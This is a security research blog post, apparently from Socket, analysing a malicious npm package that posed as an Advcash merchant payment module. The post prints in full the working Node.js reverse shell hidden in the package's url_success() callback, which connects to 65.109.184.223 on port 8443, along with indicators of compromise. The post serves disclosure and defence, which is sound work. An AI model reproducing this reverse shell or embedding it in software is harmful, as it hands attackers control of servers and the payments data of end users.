
Research
NPM targeted by malware campaign mimicking familiar library names
Socket uncovered npm malware campaign mimicking popular Node.js libraries and packages from other ecosystems; packages steal data and execute remote code.
Research
Socket Research Team
Sarah Gooding
April 14, 2025
What if clicking “Pay” didn’t just confirm a transaction but handed over your server access to an attacker?
The Socket Threat Research has discovered an npm package, @naderabdi/merchant-advcash, designed to do exactly this. The open source package quietly bundles a reverse shell inside a payment success callback. The module posed as a merchant integration for Advcash, a lesser-known digital payment platform often used in gray-market crypto exchanges, offshore financial services, and certain high-risk e-commerce operations. The service rebranded to Volet last year and is not available to users located in the U.S.
While Advcash isn’t a household name like PayPal or Stripe, it occupies a distinct niche in the payments landscape, one that makes it a tempting disguise for attackers seeking plausible cover.
The package implements real business logic: hashing payment data, validating credentials, and mimicking a legitimate payment processing flow. But beneath that veneer, a self-executing reverse shell waits to be triggered, not during install or import, but during a transaction success event. That moment where a payment has been completed and everything seems secure is precisely when the attacker seizes control.
Even though the attacker planted the payload in a developer-facing module, the actual impact vector is end users making payments through Advcash. It’s stealthy, context-aware, and designed to operate at a point of maximum trust. This kind of situational payload is rare, but we're seeing it pop up more in malware lately, including a recent supply chain attack targeting WooCommerce merchants with automated carding attempts.
@naderabdi/merchant-advcash
?#This package implements functions for creating payment orders, validating incoming requests from Advcash, and updating transaction statuses. It even performs input validation, hash verification, and currency/amount consistency checks, all expected behaviors in legitimate payment modules.
However, a closer look at the url_success()
method uncovers the threat actor's malicious intent.
The package @naderabdi/merchant-advcash
contains hardcoded logic that opens a reverse shell to a remote server upon invocation of a payment success handler. It is disguised as a utility for merchants to receive, validate, and manage cryptocurrency or fiat payments.
The payload embedded in its logic triggers a reverse shell that connects to the IP address 65.109.184.223
over TCP port 8443
, providing the attacker remote control over the victim’s system, a classic backdoor tactic hidden inside merchant payment flows.
Unlike many malicious packages that execute code during installation or import, this payload is delayed until runtime, specifically, after a successful transaction. This approach may help evade detection, as the malicious code only runs under specific runtime conditions. It also suggests a likely goal: to compromise production environments, where real transactions and sensitive operations take place.
The package includes a well-structured create_payment()
method that constructs transaction payloads, hashes values using SHA-256, and builds ac_sign
tokens based on merchant credentials. It pulls sensitive keys such as email, password, and SCI name using dynamic config.get()
calls, further masking itself as a serious payment module.
const stt_hesh = API_Email + ':' + API_SCI_Name + ':' + amount_pay + ':' + currency + ':' + API_Password + ':' + order.uid;
const hash = crypto.createHash('sha256').update(stt_hesh).digest('hex');
At the very bottom of the url_success(req, res)
function—intended to respond to successful payment notifications—the attacker embedded a self-executing function that initiates a reverse shell to a remote host.
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(8443, "65.109.184.223", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application from crashing
})();
This code executes silently during a payment success event. It spawns a new /bin/sh
shell and pipes it over to the attacker's machine at 65.109.184.223
. This gives the attacker full shell access, allowing them to execute arbitrary commands, manipulate files, pivot into other internal systems, or exfiltrate data.
The reverse shell is not a standalone file or script. It is embedded inside a method meant to handle payment success callbacks—typically invoked by payment gateways like Advcash or Payeer. Here’s the surrounding context:
url_success(req, res) {
(function(){
// reverse shell...
})();
return (async () => {
res.set('Content-Type', 'text/plain');
res.writeHead(200);
res.end();
return {}
})()
}
The function appears to handle HTTP responses normally. But before the response is even set, it launches the reverse shell. This kind of stealth behavior is particularly dangerous because:
net
and child_process
.While this looks legitimate, it's designed to build trust in the module, encouraging developers to integrate it deeply within production environments, thereby maximizing the attacker’s reach once the reverse shell is triggered.
This discovery introduces more questions than it answers. Was this a targeted attack on a specific merchant using Advcash, or a broader example of malware-as-a-service aimed at small payment ecosystems where scrutiny is low? The attacker didn’t just slap malicious code into a dummy package—they constructed a believable façade, complete with merchant logic and validation flows. The reverse shell wasn’t standalone, like many other low-effort attempts at compromising developer systems. It was embedded within a working business tool.
With @naderabdi/merchant-advcash
, the attacker blends a well-formed payment processing module with a low-noise reverse shell, waiting for a victim to unknowingly hand over their server access.
The inclusion of realistic features, such as SHA-256 hashing, input validation, and merchant configuration, gives the package credibility, increasing the likelihood it would be adopted without suspicion.
It’s a reminder for developers and security teams: trust nothing blindly. Even packages that appear purpose-built for e-commerce or payments can be Trojan horses for deeper compromises.
Socket’s free GitHub app enables real-time monitoring of pull requests, flagging suspicious or malicious packages before they are merged. Running the Socket CLI during installations or builds adds another layer of defense by identifying anomalies in open source dependencies before they reach production. Using the Socket browser extension provides on-the-fly protection by analyzing browsing activity and alerting users to potential threats before they download or interact with malicious content.
We have reported this malicious package to the npm team, and it was promptly removed to prevent further attacks.
Malicious Package: @naderabdi/merchant-advcash
Reverse Shell IP: 65.109.184.223
Reverse Shell Port: 8443
Trigger Point: url_success()
callback
Backdoor Module: Inline Node.js reverse shell using net
+ child_process
SHA256 Hashing: Used for payment token masking, mimics legitimate behavior
Dhanesh Dodia
Sambarathi Sai
Dwijay Chintakunta
Subscribe to our newsletter
Get notified when we publish new security blog posts!
Try it now
Research
Socket uncovered npm malware campaign mimicking popular Node.js libraries and packages from other ecosystems; packages steal data and execute remote code.
Research
Socket's research uncovers three dangerous Go modules that contain obfuscated disk-wiping malware, threatening complete data loss.
Research
Socket uncovers malicious packages on PyPI using Gmail's SMTP protocol for command and control (C2) to exfiltrate data and execute commands.